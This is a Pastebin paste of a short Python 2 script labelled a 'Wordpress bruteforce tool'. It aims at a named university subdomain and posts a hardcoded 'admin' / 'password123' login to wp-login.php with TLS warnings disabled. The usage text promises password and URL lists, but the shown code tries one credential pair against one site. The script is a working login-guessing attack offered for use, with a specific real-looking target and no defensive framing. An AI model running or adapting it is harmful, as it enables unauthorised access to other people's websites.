Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import urllib2,urllib
- import sys,time
- import json
- import requests
- import hashlib
- import logging
- requests.packages.urllib3.disable_warnings()
- URL="http://mrrs2014.ieee.nau.edu.ua"
- LOGIN="admin"
- PASS="password123"
- #print "[Wordpress bruteforce tool]"
- #print "usage: python wpb.py passwords.txt urls.txt"
- def brute_url(urly):
- urlx=urly+"/wp-admin/"
- urlz=urly+"/wp-login.php"
- payload={'log':LOGIN, 'pwd':PASS, 'wp-submit':'Log In', 'redirect_to':urlx, 'testcookie':'1'}
- s=requests.session()
- s.get(urlz)
- r=s.post(urlz, data=payload, allow_redirects=True)
- print r.content
- if len(sys.argv) > 1:
- #filenamex = sys.argv[1]
- brute_url(URL)
- else:
- print "usage: python wpb.py passwords.txt urls.txt"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement